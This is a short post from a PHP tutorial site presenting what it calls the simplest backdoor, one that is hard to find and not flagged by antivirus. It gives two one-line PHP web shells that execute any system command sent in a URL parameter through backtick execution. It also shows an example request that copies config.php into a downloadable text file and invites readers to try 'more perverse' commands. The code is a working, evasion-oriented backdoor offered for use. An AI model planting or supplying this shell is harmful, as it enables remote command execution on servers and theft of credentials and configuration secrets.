PHP最简单的后门,且难查,不报毒!
- PHP中文网원래의
- 2016-05-23 16:40:092054검색
php代码
<?php
$c=urldecode($_GET['c']);if($c){`$c`;}//完整
!$_GET['c']||`{$_GET['c']}`;//精简
/*******************************************************
* 原理:PHP中``符号包含会当作系统命令执行
* 示例:http://host/?c=type%20config.php>;config.txt
* 然后就可以下载config.txt查看内容了!
* 可以试试更变态的命令,不要干坏事哦!
*******************************************************/성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
이전 기사:生成nginx配置文件,反向代理google다음 기사:利用Redis生成订单号